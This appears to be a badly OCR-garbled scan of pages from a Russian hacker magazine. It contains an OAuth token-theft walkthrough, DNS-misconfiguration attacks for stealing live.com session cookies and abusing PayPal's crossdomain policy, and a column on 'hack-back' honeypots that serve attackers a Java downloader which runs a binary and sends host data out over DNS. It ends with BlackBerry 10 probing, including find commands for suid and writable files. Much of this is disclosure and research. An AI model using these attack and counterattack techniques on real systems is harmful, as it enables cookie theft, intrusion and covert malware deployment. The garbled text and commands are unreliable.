которых мы хотим слить. 

Эксплуатация: 

1 . Открываем кучу окон с пробными сІіепНсІ популярных при- 
ложений (в хроме разрешено до 25 окон). 

2. Если данное приложение уже было авторизовано, то его 
редиректит на РВ_РАТН#...зідпесІ_гедие5І:=ЗВ&ассе55_ 
1океп=ТОКЕМ&з1:а1:е=РАѴІ_ОАО. 

3. Здесь фейсбук копирует значение хеша в путь и ре- 
директит на РВ_РАТН/...?зідпесІ_гедие5І:=5В&ассе55_ 
Іокеп =ТОКЕІ\І &з*а*е= РАУЮАЭ . 

4. Сервер отвечает НТМЬстраницей и хедером Х-Х55- 
РгоіесЬоп: '1; ппосІе=Ыоск'. Кстати, ІІВІ_ содержит наш 
рауіоасі, который также содержится на странице, — поэтому 
хром блокирует и редиректит на аЬоиЬЫапк. 

5. Наш парент теперь имеет доступ к этому окну, так 
как аЬоиЬЫапк наследует наш ориджин, мы заходим и пар- 
сим ассез5_1океп=ТОКЕІ\І из ріаудгоипсі. боситепЕ геТеггег 
и закрываем ріаудгоипсі. 

ЗАКЛЮЧЕНИЕ 

Важно понимать, что ОАиІЬ не протокол, а лишь фреймворк, 
на основе которого провайдеры строят свои АРІ. В этом кро- 
ется серьезная проблема совместимости — разработчики 
не могут создать единый интерфейс для любого провайде- 
ра, к сожалению. За это ОАЩЬ и получает массу критики, 
что он «новый» Цаѵа/ХМІ_/РНР (то есть некая неудобная, но по- 
пулярная технология). При этом он пытается оставаться удоб- 
ным, игнорируя МІТМ и шифрование и полностью полагаясь 
на НТТРЗ-соединение. Да, он объективно удобней и понятней 
для разработчика, чем ОАиШІ, но он слишком абстрактен, 
и многие важные (в плане безопасности) моменты остаются 
на усмотрение провайдера. 

Например, РасеЬоок до сих пор не исправил гибкий гесІігес1_ 
игі и СЗПР на логине, так как, по их словам, это несерьезные 
угрозы. Все это очень даже смешно, я помню как минимум 
пять простейших уязвимостей, суть которых была в подмене 
гесІігесі_игі/гезропзе_1:уре и паре редиректов, которые приводи- 
ли к угону токенов. По баунти-программам они отдали больше 
30 килобаксов вместо того, чтобы исправить очевидно кривую 
архитектуру их реализации. Победителей не судят? □□ 



7 <? 



Взлом 
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ОДНА о 

УЯЗВИМОСТЬ — 
МНОГО РЕВАРДОВ 

Ошибки настройки топовых веб-проектов 

Очень здорово было бы найти какую-то одну уязвимость, которая работала бы 
на всех веб-проектах сразу. Эдакий крякер интернета :). Но сделать это до- 
вольно трудно, ведь у проектов разный функционал, написаны они на разных 
языках, работают под разными платформами. Но есть и много общего между 
всем вебом — протокол НТТР и механизм РЫЗ. Мы задались целью немного 
изучить внутреннюю кухню РЫЗ крупнейших веб-ресурсов и нашли у многих 
из них один очень интересный общий баг, о котором и пойдет речь. 




ѴѴАІШШС 



Вся информация предо- 
ставлена исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут от- 
ветственности за любой 
возможный вред, при- 
чиненный материалами 
данной статьи. 



ПОЧЕМУ БЫЗ? 

Хороший вопрос. Мы выбрали ЭІЧЗ как вектор 
изучения по многим причинам. Во-первых, ЭЫЗ 
был, есть и остается основой методологии об- 
следования периметра при любых аудитах и пен- 
тестах. Именно отсюда чаще всего начинается 
сбор информации. Обратные зоны, резолв, брут- 
форс по словарю и так далее. Во-вторых, ЭІЧЗ 
ложится в основу фундамента всей клиентской 
безопасности веба — Зате Огідіп Роіісу. Как го- 
ворится, Эоплатз, ргоіюсоіз апсі рогіз плизі: таісіі. 
Так вот именно домен — это ЭЫЗ. Помимо этого, 
как ты уже знаешь, ЗОР есть не только в самих 
браузерах, но и в плагинах, таких как Цаѵа и РІазТі. 
У них свои причуды, и нередко в сгоззсіотаіп. 
хті можно видеть *.сІотаіп.сот (например, вот: 
Іі1:1:рз://\л/\л/ѵу.раѵраІ.сот/сгоззсІотаіп.хтІ ). Нако- 
нец, третья причина — это механизм управления 
соокіе. Чаще всего соокіе наследуются браузе- 
ром на все поддомены относительно того доме- 
на, с которого они пришли (например, ТасеЬоок. 
сот). Это удобно для настройки сквозной автори- 
зации между своими проектами, но и открывает 
дополнительные возможности для атак на клиен- 
тов при получении доступа к каким-либо из веб- 
ресурсов внутри такой вот «доверенной» домен- 
ной зоны. 

КЛЮЧ НА СТАРТ! 

СОБИРАЕМ ИНФОРМАЦИЮ 

Правильный дебют — залог успеха. Собрать све- 
дения по всем ЭІ\І8-именам периметра не так 
легко, как может показаться. Причина простая: 
сам периметр по ІР-адресам тесно связан с ЭІМЗ- 
записями (одно из другого, как правило, и следу- 
ет). Но точка входа едина — это основной домен. 
Берем его и начинаем копать вглубь — брутим 
поддомены, резолвим обратные зоны. Все 



как всегда, в общем. Для этих целей пригодится 
замечательная утилита сіпзтар ( ЬИ:.іѵ/12Е8рХР ). 
Очень простая в использовании и функциональ- 
ная штука, к тому же содержащая уже набор слов 
для перебора доменных имен. Эта программа, 
к слову, входит в стандартный Васкітаск (Каіі) 
І_іпих и другие сборки систем для пентестов. В ка- 
честве альтернатив можно рекомендовать скрип- 
ты ЬіІ.Іѵ/ІЬаѵбсІР и ЬіІ.Іѵ/ІЗІассІа . Но пригодиться 
они могут, разве что когда нет возможности со- 
брать из сырцов сіпзтар. 

Только замечание — веб такой веб, что в ре- 
альной жизни дедовских (сетевых) методов ис- 
следования периметра может и не хватить. Тут 
надо и сгоззсіотаіп. хті проглядывать, и по само- 
му веб-ресурсу активно краулерами шариться. 
Тот же гугл использует массу не *. доодіе.сот 
доменов для разных целей. Но здесь нам хоро- 
шо фартило: некоторые из подопытных целей 
крупнейших интернет-проектов отдают всю свою 
зону, так что даже брутить особо-то и не при- 
шлось. 

СМОТРИМ БОБА! 

РАЗГРЕБАЕМ РЕЗУЛЬТАТЫ 

Итак, долго ли, коротко ли, мы получили списки 
поддоменов следующих интернет-гигантов: 

• аи.сопл 

• Ьаісіи.сот 

• ссЫІІ.сот 

• ІдсеЬоок.сот 

• доодіе.сот 

• Ііѵе.сот 

• тісгозоИсот 

• покіа.сот 

• раураі.сот 

• уаНоо.сот 

• ІѵѵіПег.сот 



Сразу оговоримся — по понятным причинам 
списки неполные. Во-первых, брут всегда огра- 
ничен словарями. Во-вторых, не все домены веб- 
проекта, скажем доодіе, покрываются маской 
*. доодіе.сот (тот же дтаіі.сот, например, чего 
уж далеко ходить). В-третьих, брутили мы только 
домены третьего уровня, не залезая ниже. Тем 
не менее этого списка вполне хватило для ста- 
тистической выборки и получения интересных 
результатов. 

Мы начали детально смотреть на ІР-адреса 
в А-записях ЭЫЗ поддоменов и обнаружили 
странные вещи: многие админы крупнейших ком- 
паний держат в публичных ЭЫЗ ІР-адреса вну- 
тренних сетей! Удивление не было столь сильным, 
поскольку в классическом смысле сетевых атак 
этот факт есть только раскрытие чувствительной 
информации. Но с точки зрения веба это фаталь- 
но. Подумай сам — ребята доверили свои доме- 
ны (поддомены своего проекта, своего детища) 
ІР-адресам, которые им не принадлежат! Ведь 
в разных приватных (локальных) сетях будут свои 
хосты, висящие на тех же адресах, что поддомены 
этих админов. 

Много слов и ничего не понятно? Тогда стоит 
немного изучить основы работы интернета и ІР- 
протокола. Лучше всего изучить ПРО 1918 ( іооіз. 
іеСТ.ога/ИітІ/ііс1918 ). но если уж совсем нет 
времени, то краткое содержание здесь ( Ьіі.Іѵ/ 
УІЮСсІТ ). Говоря простым языком, ошибка состо- 
ит в самой идее привязывать ОЫЗ-имена на адре- 
са внутренних сетей, типа 10.0.0.1, 192.168.0.1, 
172.21.0.1 и тому подобные. Почему ошибка? 
Как написано выше, таким образом ты отдаешь 
привилегии своей доменной зоны на ІР-адреса, 
которые тебе не принадлежат. Ведь в других 
внутренних сетях совсем другие машины будут 
по тем же адресам! 
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Одна уязвимость — много ревардов 
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Домен 


А-записей 

10/8 


А-записей 

172.16/12 


А-записей 

192.168/16 


Всего 

небезопасных 

А-записей 


аН.сот 


0 


0 


0 


0 


Ьаіскі.сот 


59 


6 


0 


65 


ссЫМ.сот 


2 


0 


0 


2 


РасеЬоок. сот 


9 


0 


0 


9 


доодіе.сот 


0 


0 


0 


0 


Ііѵе.сот 


1 


0 


0 


1 


тісгозоЛ.сот 


0 


0 


0 


0 


покіа.сот 


1 


1 


23 


25 


раураі.сот 


1 


0 


1 


2 


уаііоо.сот 


2 


0 


0 


2 


Іѵѵіііег.сот 


0 


0 


0 


0 



Вот такие забавные результаты получились 
у нас для просканированных интернет-гигантов. 

Получается 7 из 11, то есть -63%, — неутеши- 
тельно. Хотя, скорее всего, именно наши ограни- 
чения при сканировании ЭЫЗ не дали получить 
оставшиеся 37% результатов. 

ЭКСПЛОЙТ ВСЕМУ ГОЛОВА: 

СТРОИМ ВЕКТОРАТАКИ 

Итак, вскрытие показало, что у большинства то- 
повых веб-проектов есть ЭІЧЗ-записи, смотря- 
щие в приватные (локальные) сети. Что нам это 
дает? Возвращаемся к первому абзацу — с чего 
мы, собственно, начали смотреть в сторону ЭІЧЗ: 
соокіе и ЗОР. Отсюда ровно два варианта разви- 
тия событий. Начнем с кук, так как, скорее всего, 
покрытие здесь будет больше. Наш вектор атаки 
мог бы основываться на классическом МІТМ вну- 
три того же сегмента сети, но тогда все эти трюки 
с поддоменами выглядели бы очень избыточны- 
ми — МІТМ ВЫЗ-серверов, и все дела :). Профит 
от такой уязвимости (скорее даже ошибки в на- 
стройке ВЫЗ) более интересный и дает возмож- 
ность провернуть все без МІТМ. Вот сценарий 
атаки: 

1 . Атакующий и жертва находятся в одной под- 
сети, с адресацией, совпадающей с той, где 
расположена уязвимая А-запись ВІЧЗ целево- 
го ресурса (например, 10/8 для Ііѵе.сот). 

2. Атакующий поднимает у себя интерфейс 
с адресом, соответствующим небезопасной 
А-записи (10.245.6.27 для плопііюгіпд. Ііѵе.сот). 

3. Атакующий передает тем или иным спосо- 
бом жертве ссылку на домен с небезопасной 



А-записью (здесь все полностью аналогично 
отраженному вектору атаки Х88 или С5ВР). 

4. Атакующий получает после обработки ссылки 
в браузере жертвы запрос на свой хост, к кото- 
рому будут прикреплены все соокіе браузера 
жертвы, распространяемые на все поддоме- 
ны уязвимого проекта (например, *. Ііѵе.сот). 
Это и есть профит :). 

Очевидно, что в данном случае есть сле- 
дующие ограничения: соокіе с флагом Зесиге 
будут передаваться только в том случае, если 
жертва примет поддельный сертификат атаку- 
ющего. Что само по себе уже дает возможность 
делать МІТМ, и данный вектор становится бес- 
полезным. Таким образом, можем утверждать, 
что флаг Зесиге на соокіе будет хорошей за- 
щитой от этой атаки. А вот флаг НКрОпіу, на- 
против, по понятным причинам никакой защиты 
от такого вектора не представляет. Ведь атаку- 
ющий работает с куками на сетевом уровне, 
а не на уровне ЭОМ, где куки защищает флаг 
НПрОпіу. Кажется, слишком сложные и большие 
ограничения для реальной атаки? Мы сначала 
тоже так подумали :). 

Но раз уж взяли для примера *. Ііѵе.сот, рас- 
смотрим подробнее, какие же куки в данном слу- 
чае будут передаваться и как. Нас интересует, 
например, почта на таіі. Ііѵе.сот — почему бы 
и нет :). После авторизации на таіі. Ііѵе.сот поль- 
зователь получает целый ворох печенья в свой 
браузер. На разных куках разные флаги и разная 
привязка к доменам (какие-то привязаны к Міѵе. 
сот, какие-то к *. таіі. Ііѵе.сот). Проведем про- 



стой эксперимент — удалим все куки, которые мы 
не сможем получить через данный вектор атаки, 
то есть *. таіі. Ііѵе.сот и все с флагом Зесиге. За- 
тем пробуем обновить страницу... Барабанная 
дробь — все работает! Остатка кук вполне себе 
хватает, чтобы ходить с ними на ИНрз://таіі. 
Ііѵе.сот и читать почту. Ирония, не правда ли, 
что флагом Зесиге М3, например, защищает ткі, 
содержащие локаль, наподобие ш-ВІІ, но не за- 
щищает сессию... 

Вектор атаки номер два носит гордое имя 
раураі.сот, так как именно на этой крупнейшей 
и безопаснейшей платежной системе можно 
найти следующий конфигурационный файл ЗОР 
для РІазИ: раураі.сот/сгоззсіотаіп.хті: 

<сго55-сІ отаіп-ро 1ісѵ> 

оПом-ассезз-Тгот с!отаіп= "*.<-■ 

раѵра1.сот"/> 

<а11оіл/-ассезз--Ргот с!отаіп=" *.<-» 
еЬау.сот"/» 

оПом-ассезз-Тгот бота іп= "*.<-» 
раѵраІоЬіесЕз . сот"/> 
</сгозз-сІотаіп-ро1ісу> 

Ребята, вы МО-ЛО-ДЦЫ!!! Сценарий атаки 
такой же, ровно до пункта 4, где злоумышленник 
не только получает соокіе, но и передает в ответ 
страницу с РІазІі-роликом, который уже может вы- 
полнять междоменные запросы. Браузер жертвы 
спокойно отдает такому ролику контент любой 
страницы на раураі.сот со всей авторизацией, 
а дальше ролик может творить с этим контентом 
уже все что угодно. Например, выслать злоумыш- 
леннику. Весело и просто. Если бы не было так 
печально. 

МОРАЛЬ 

Все обнаруженные уязвимости мы отправили 
разработчикам, пользуясь публичными програм- 
мами поощрения за обнаруженные уязвимости. 
Практически все они на настоящий момент ис- 
правлены. За исключением тех примеров, кото- 
рые были приведены выше, — РауРаі и Ііѵе.сот. 
Что ж, право вендоров — исправлять данные 
баги или нет, а наше право как исследователей — 
сообщить о такой проблеме владельцам других 
ресурсов. Так или иначе, ревард-программы — 
это прикольно, многие ответили и даже запла- 
тили, благо покрытие баги получилось очень 
хорошее. РасеЬоок, к слову, отказался прини- 
мать ошибку настройки Э1\13 как уязвимость, так 
как все куки авторизации у них имеют Зесиге- 
флаг, а сгоззсіоплаіп.хті не включает уязвимые 
домены. Тоже их право — фактически вектора 
атаки нет, мы полностью согласны. Спрашивать 
о том, что учитывается в ревардах — атака или 
уязвимость, смысла нет: хозяин — барин, как го- 
ворится. □Е 



4- С Й і’Л| Иг і-і г /■■■ рир«І гіт.І іііііііИііиіііі і» I О. ф 

ТЬіз ХМЬ Ше сіоея поі арреаг й Ьаѵе апу зіуіе іп&гтагіоп азаос 
\ѵіііі іі. ТЬе гіоситепі Ігее із зЬо\ѵп Ьеіоѵ/. 



▼ <сго9 е -еіотаіп-р 0 Іісу> 

<аІ1ою-ассезз-Ёгот дотаіп- " * . раура! , сот" /> 
<а11оы-ассеез-^гот <іотаіп= " * * еЪау . сот" /> 
<а 1 І 0 ѵ-ассезз-Ігош йотаіп- " * . раура ІоЬзесЪз * сот" /> 
</ егоз 5— сіотаігѵ— р0Іісу> 




Небезопасный файл настройки 50Р для РауРаі — разрешены 
все поддомены 



Куки почты Ііѵе.сот, очень много данных, но все значимые 
без Зесиге -флага 
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КОЛОНКА 

АЛЕКСЕЯ 

СИНЦОВА 



ПРОАКТИВНАЯ 

ЗАЩИТА: 

ОБРАТНОЕ ПРОНИКНОВЕНИЕ 

Сегодня я бы хотел обратить внимание на «проактивные» ме- 
тоды защиты. Другими словами — что будет, если атакуемая 
среда начнет проводить атаки сама? С апреля 2011 года, когда 
открылся наш сайт беТсоп-гиззіа.ги, и по июль 2012-го я провел 
такой эксперимент на практике. Результаты этого труда были 
представлены на ВІаск На! ЕІІ 2013 и позже на конференции 
РНРауз III. Резюме читай тут! 



ЗАЧЕМ МНЕ НАПАДАТЬ? 

Что ж, на самом деле цель довольно очевидна — раскрыть атаку- 
ющего, узнать о нем гораздо больше, чем поведает нам ІР-адрес 
его прокси-сервера или точки выхода Тог. В основу идеи лег прин- 
цип «большинство атакующих не ждут контратаки». Этим объясня- 
ется их более спокойное отношение к рабочей среде. А что, если 
попытаться их «пробить» или применить иные атаки для раскры- 
тия истинного лица? Если это сработает, то мы сможем получить 
гораздо больше информации об атакующем. Причем если делать 
все это автоматически, то будет вообще сказка. Итак, причины 
довольно банальны, но было и еще кое-что: открывая такой сайт, 
как сІеТсоп-гиззіа, ты понимаешь, в какой среде обитаешь, — боль- 
шинство посетителей этого сайта так или иначе захотят самоут- 
вердиться или как минимум просто не смогут сдержаться, чтобы 
не попробовать провести какую-нибудь атаку. Но при этом и их до- 
верие к сайту будет несколько занижено, учитывая тематику. 

ХОНИПОТ, КОТОРЫЙ КУСАЕТСЯ 

Главной задачей будет создать «приманку» — некий сервис, 
сервер или пусть даже скрипт, который привлечет атакующего, 
так что тот начнет проявлять свои агрессивные повадки именно 
в этом самом месте. Фактически хонипот. Только нам он нужен 
для однозначной классификации пользователя как «атакующе- 
го». Как только хонипот сгенерировал алерт — мы можем разви- 
вать контратаку и пробивать атакующего ответным огнем. Важно 
(чисто юридически), чтобы этот самый «ответный огонь» никоим 
образом не мог быть интерпретирован как «распространение 
вредоносного ПО». Это тонкий момент, и юристы тут могут несла- 
бо повеселиться. Но с точки зрения морали и этики технически 
адекватного населения — все просто. Приведу пример. Допу- 
стим, у меня есть РТР. Закрытый паролем. На РТР лежат бинарные 
файлы некоего проекта. Некто подбирает пароль, скачивает наш 



проект и запускает его. А проект оказался трояном-вирусом- 
мировым-злом. В итоге пострадал тот, кто скачал этот файл. 
Но мы можем сказать: «Наш РТР закрытый, а этот код не рас- 
пространялся, нет никаких ссылок на этот РТР, а тем более 
пароль никому не известен. Цель хранения этого ПО — наша 
личная, мы исследователи ИБ, пентестеры, это наше профес- 
сиональное ПО... И то, что какой-то нехороший человек за- 
пустил его, — это его инициатива и его вина. Да, пароль был 
асіплішасітіп, ну и что?» Понятно, что мы не совсем искренни, 
ведь настоящая цель — заражение атакующего. Но юридиче- 
ски это неочевидно, так как тут встает вопрос мотивов, дей- 
ствий и последствий. В общем моральном плане, я думаю, это 
хорошая и стоящая идея — в ловушку попадаются только «пло- 
хие люди», мы их вычисляем и раскрываем их злобные планы 
по захвату мира :). При этом невинные пользователи не стра- 
дают. Реализация зависит сугубо от фантазии и возможностей. 
Например, я просто создал форму ввода приватного инвайт- 
кода для «элитных» якобы мемберов. Соответственно, тот, кто 
вводил нечто напоминающее ЗОЕ Іпіесіюп для обхода элитной 
авторизации, получал загрузку приватного-элитного апплета 
^ѵа, типа СШ-интерфейс для мемберов. Да, да — социальная 
инженерия слабовата, но для начала сойдет. Логично, что ^ѵа 
СІІІ был боѵѵпіоасіег’ом, который просто качал бинарник и за- 
пускал. Бинарник, в свою очередь, собирал не персональные 
технические данные и слал их по реверсивному ЭЫЗ-каналу 
на мой сервер. Собирал я простую инфу: 

• информацию о сетевом окружении; 

• ІтасегоіДе до точки; 

• имя машины; 

• имя пользователя (логин); 

• имя домена; 

• внешний ЭЫЗ. 
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Колонка Алексея Синцова 
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Даже такие сервисы , 
какЫпкесЛп, можно 
использовать для 
сбора информации об 
атакующих (редирект 
на специально под- 
готовленный профайл 
как минимум раскроет 
место работы атакую- 
щего, что, согласись, 
уже немало) 



Сбор данных об атакующем, после того как он осуществил свое «грязное» деяние 



Эта информация позволяла мне достаточно четко идентифи- 
цировать атакующего, не собирая его персональные данные :). 
Хотя, конечно, частенько некоторые умельцы запихивали в зна- 
чение логина свои фамилии, особенно если работали из корпо- 
ративной сети, где это считается нормальной практикой. 

В итоге получилось некоторое количество пробивов. В ос- 
новном это были скрипт-кидди, а также вайт-хат ресерчеры 
(мы даже попали в корпоративную сеть одной крупной отече- 
ственной ИБ-компании — по неосторожности любопытного 
сотрудника, который, хоть и знал о действии, все равно загру- 
зил боевой сэмпл в домене). Кстати, многие думали, что это 
был некий хак-квест. Но были и интересные «репорты», на- 
пример с виртуальных машин одной антивирусной компании. 
При этом понять, что компания антивирусная, помог именно 
Ітасегоиіе. То есть кто-то специально закачивал бинарный 
файл на «лабораторный» компьютер с целью изучения. Это 
приятно. 

Кроме сбора данных об атакующих, мы были втянуты даже 
в кибервойну ;). В один прекрасный день мы обнаружили логи 
с домена, принадлежавшего разведке одной бывшей союз- 
ной республики. То есть мы упали на сервак разведки другого 
государства. Сначала мы обрадовались, что вот, кто-то про- 
водит агрессивные действия и мы действительно поймали 
шпиона. Но заметили, что скомпрометированная учетка вы- 
глядит «сервисной», как и имя машины. Чуть позже мы по- 
лучили второй пробив из того же государства, только в этот 
раз с частной машины, где имя пользователя было похожим 
на никнейм. Если погуглить, то можно найти хактивиста-ре- 
серчера с таким никнеймом, причем родом из того же госу- 
дарства. Либо он там работает, либо он скомпрометировал 
как-то правительственную машину и решил сначала «пойти 
на нас» оттуда. 



В любом случае данная техника «контрнападения» по- 
казала себя как минимум отличным дополнением к хони- 
поту/ЮЗ. Она не ухудшает общих качеств системы, но если 
сработает «агрессивная» защита, то мы получим много 
полезной информации, позволяющей раскрыть источник 
атаки и атакующего. Более того, систему можно накру- 
чивать и добавлять новые плюшки и фишки. Так, я доба- 
вил эксплойты, направленные не на систему атакующего, 
а на уязвимости в популярных веб-сервисах. Например, 
веб-сервисы таіі.ги и уапбех.ги содержали уязвимость 
ЦЗОЫР Нііаскіпд, позволяющую сторонним ресурсам рас- 
крывать идентификатор (логин, а фактически етаіі) по- 
сетителя, используя легитимный СЕТ-запрос (на данный 
момент уязвимости закрыты, так как я сообщил о них). 
Разумеется, можно использовать эту фичу, чтобы полу- 
чить почтовые адреса наших атакующих. В результате мы 
узнали адреса тех, кто пытался атаковать нас и при этом 
был аутентифицирован на одном или обоих почтовых сер- 
висах. Финальная статистика: 

• всего уникальных атак — 484; 

• всего уникальных контратак апплетом и СИ — 52; 

• всего уникальных контратак Ц80ЫР (таіі.ги/уапсіех.ги) — 16. 

Как видно, данная техника может быть реально полезна 
и работает для определенных классов нарушителей. На- 
сколько мне стало известно после моего выступления в Ам- 
стердаме, американские службы уже используют эти под- 
ходы на практике и даже есть фирмы, которые оказывают 
услуги по организации такой, проактивной защиты. Думаю, 
это отличная тема исследования для юристов, хакеров и за- 
щитников информации, так что если ты пишешь диплом — 
вот тебе темка. Да пребудет с тобой Сила! ШИ 
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ПРЕПАРИ РУЕМ 
ЕЖЕВИКУ 



Опыт поиска 
уязвимостей 
в ВІаскВеггу 7ло 

Казалось бы, ежевичные смартфо- 
ны уже столько лет на рынке и их 
ПО давно должно быть приближено 
к идеальному. Однако мое небольшое 
исследование, о котором я тебе се- 
годня расскажу, говорит совершенно 
об обратном. 




ЗНАКОМСТВО С ВІ.АСКВЕВВѴ 21 0 

В начале 2013 года ВІаскВеггу выпустила в свет новую опе- 
рационную систему ВІаскВеггу 10, которая существенно 
отличалась от остальных ОС, представленных на рынке 
смартфонов. Был заявлен высочайший уровень безопас- 
ности, и ожидания от нее были соответствующими. Некото- 
рые аналитики даже рассматривали ее как последний шанс 
для ВВ, чтобы «вернуться в большую игру» и стать в одном 
ряду с такими ОС, как АпбгоісІ и ЮЗ. Сегодня я познакомлю 
тебя с этой операционкой, расскажу о методах и результа- 
тах ее тестирования в плане безопасности, основываясь 
на которых ты сам сможешь поисследовать другие устрой- 
ства, и, конечно же, поведаю о найденных такими способа- 
ми уязвимостях. 

ОБЩЕЕ ОПИСАНИЕ ОС 

ВІаскВеггу ОЗ — закрытая II N IX- подобная мобильная опе- 
рационная система, основанная на ОІМХ. Про последнюю 
уже было довольно много разговоров, так что пробежимся 
по основным моментам. СИХ основана на принципе микро- 
ядерной архитектуры. Это значит, что кроме микроядра 
и менеджера процессов все остальное в системе, включая 
драйверы, — отдельные процессы. Все процессы управля- 
ются менеджером и передаются микроядру для исполнения. 
В случае если приложение попытается записать в память, 
которая им не контролируется, менеджер распознает это 
и отправит сигнал ядру на убийство процесса. Кроме того, 
приложение имеет доступ только туда, куда ему разрешен 
доступ системой. Принципиальная схема работы ОІЧХ пред- 
ставлена на рис. 1 . 

Еще один ключевой компонент минимальной микроядер- 
ной системы — загрузчик. Загрузка программ также осущест- 
вляется не в самом ядре, а в разделяемых библиотеках поль- 
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зовательского пространства, как часть Ьооі ітаде. Более того, 
можно поместить весь Ьооі: ітаде в ПОМ — это применяется 
в бездисковых встраиваемых системах. 

ТЕСТОВАЯ СРЕДА 

Тестирование проводилось на последнем на момент на- 
писания статьи смартфоне ВІаскВеггу 210 (номер модели 
ЗТИОО-2) с версией прошивки 10.0.10.690. Полная информа- 
ция о версиях: 

• ОЗ: ВІаскВеггу 10; 

• ОЗ Ѵегзіоп: 10.0.10.690; 

• ОІМХ Ѵегзіоп: 8.0.0; 

• РІазТі РІауег Ѵегзіоп: 11.1.121.108; 

• АІП Ѵегзіоп: 3.1.0.108; 

• СгуріодгарМіс КегпеІ Ѵегзіоп: 5.6.2.44214; 

• \А/І_АІ\І Ѵегзіоп: 1.1; 

• Пабіо Ѵегзіоп: 10.0.10.691 ; 

• ѴѴеЬКі* Ѵегзіоп: 10.0.10.251; 

• Вгоѵѵзег Ѵегзіоп: 10.0.10.288. 

ШЕЛЛ -ДОСТУП К УСТРОЙСТВУ 

К счастью для исследователя, получить шелл на ВВ210 до- 
статочно просто. Для начала необходимо в настройках вклю- 
чить режим разработки (5еШп§з — > Бесигіііу апсі Ргіѵасу— ► 
Оеѵеіортепі: Мосіе — > Оп). После этого нужно инициировать об- 
мен ключами с хоста. Этого можно достичь как минимум двумя 
способами: 

Используя ВІаскВеггуВОКТооІз 

Генерируем 4096-битный ПЗА-ключ, запустив команду ззИ- 
кеу§еп -Ь 4096 в І_іпих, либо при помощи риКудеп.ехе (выбрав 
в настройках ЗЗН2-ПЗА) в ѴѴіпбоѵѵз. 

1. Запускаем утилиту: 
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Рис. 1 . Принципиаль- 
ная схема работы ОЫХ 



ЫаскЬеггу-соппесЕ <1:аг%е1:-Іі05І:> -раззыргсі <-■ 
<сІеѵісе-ра55ыопсІ> -ЗБІіРиЫісКеѵ <55Іі-риЫіс-кеѵ> 



2. Обмен осуществлен. Открываем новое окно и коннектимся 
к ІР, указанному в меню Оеѵеіортепі: Мосіе (по умолчанию 
169.254.0.1). 

Используя 0іпдІеЬеггу(джейлбрейк-тулза 
для РІауВоок) 

Щелкаем на вкладку Іпзііа 11 55Н— ►0іп§1е 55Н и видим окно 
терминала. Успех! 



ПЕРВИЧНОЕ ЗНАКОМСТВО 

Итак, мы подключились к устройству и обнаружили себя 
в папке /ассоипіз/сіеѵизег. Первое, на что сразу стоит взгля- 
нуть, когда начинаешь исследование системы, — нет ли в ней 
очевидных ошибок, таких как бэкдоры, неправильные права 
доступа, зиісі/здісі и тому подобное. Уязвимость в ВІаскВеггу 
РІауВоок вплоть до версии 2.0.0.6149 заключалась в возмож- 
ности запуска утилиты зеШісІдіс! с последующим запуском 
/Ьіп/зіі с привилегиями рута. Конечно, здесь такой халявы уже 
нет :). 

Для проверки прав доступа файлов и папок я использовал 
простой скрипт, базирующийся на функционале всем извест- 
ной утилиты ТіпсІ . Примеры строк, позаимствованных мной 
из веб-шелла: 



1 ^ 

Рис. 2. Убийство дис- 
плея 

Рис. 3. Закирпиченный 
ВІаскВеггу 210 



"бпсі аіі зиісі 61ез" => <-■ 

"ЯпсІ / -фуре -Р -ренп -04000 -1з" 

"бпсі аіі з^ісі 61ез" => <-■ 

"бпсі / -1=уре -Р -репт -Ѳ2ѲѲѲ -1з" 

"ІіпсІ сопіі^ Ійіез" => < — 1 

"бпсі / -Ъфе Т -пате \"соп6^*\"" 

"бпсі аіі ыгіІіаЫе -Роісіепз апсі 61ез" => 

"ЯпсІ / -рег т -2 -1з" 

"бпсі аіі ыгіІіаЫе -Роісіепз апсі 61ез іп сиггепі: <-■ 
сііп" => "бпсі . -репт -2 -1з" 

В то время как зиісі/здісі на выходе не дали ничего интерес- 
ного, вывод ѵѵгИдЫе-файлов был чуть более занятным — по- 
мимо файлов пользователя тесііа, некоторые сервисы раз- 
решают запись в свои сопігоі-файлы, например ЫиеІооШ, 
плесііасопігоііег, паѵідаіог и другие. В целом, однако, анализ 
прав доступа не дал нам сорвать никаких «Іоѵѵ-Ііапдіпд Ігиііз». 
Тем не менее во время работы скрипта была обнаружена инте- 
ресная особенность — в лог было записано несколько крашей: 

• зііаск зшазіііп^ сІеіесЕесІ *: ТіпсІ Ііептіпаііесі 

Что, серьезно? ВОР без фаззинга, да еще и в системной ути- 
лите? Посмотрим, что внутри. Краш происходит, когда ТіпсІ пыта- 
ется открыть директорию, к которой нет доступа. Более подроб- 
ный анализ ты можешь найти в исходной статье ( сюо.аІ/сІРЭіВ ). 

КРАШИ? ИХЕСТЬУ МЕНЯ! 

Вдохновленные крашем в ТіпсІ, производим проверку осталь- 
ных системных утилит. Разумеется, наиболее интересна 
для нас папка /ргос/ЬооТ В ней содержатся не только важ- 
ные тулзы, запускаемые при старте, но и конфигурационные/ 
стартап скрипты, а также собственно микроядро. Разумеется, 
большая часть от нас скрыта и разрешена к исполнению толь- 
ко для рута. Посмотрим, что доступно. 

По сравнению с ранними версиями ВІаскВеггу РІауВоок, 
такие утилиты, как 5е1:иісІ§ісІ, ісі и сІитрі-Рз отсутствуют. Среди 
доступных можно выделить следующие: 

• соп-Рб'Ьг — показывает текущую конфигурацию устройства; 

• сітс — сіідііаі тесііа сопігоііег; 

• -Рзтоп — Рііе зузіепл топііог; 

• з'зс — ^ѵаЗсгірІі-движокѴѴеЬКіІ; 

• Ісіо-тзт — ШО-драйвер; 

• тЫоз-Рз, ткяпхб-Рз — форматирование файловой системы 
005/0МХ6; 

• тоипі:, оп, ггРсзегѵісе, пѵ5_мгі1:е_Ьіп, сіізріаусііі. 

Помня о тех уязвимостях, которые позволяли получить рут, 
разработчики ВІаскВеггу ограничили доступ к большинству 
сервисов, поэтому наш лимитированный беѵизег не может 
полноценно использовать практически ни одну из вышепе- 
речисленных утилит. Тем не менее, поскольку права доступа 



о г. <1 дізріаусіі -о -з Ъ -В1 -1 сЬагде апсі сІгаіп.Ывр 
■ дізріау: 1 пііе іпіі • ѵ:0 со зкіоис 

Іізріау ЕКНОН: I МЗНѲ960_дріо_соп(ід - расііпіі ( ) Гаііед. с г го г- -1 

Ііяріау ЕЯКОЯ: 1 1*3585_Ьн_іпіІ - Гаііед іо орел /Йеѵ/і2с2: Регвіззіоп сігпі*чі 

Іізріау ЕЯКОЯ: 1 дэі_зеІ_іпіегГасе_с1оскз - дзі_зеІ_іпІегГасе_е1оскз із поі івріеяепіед 

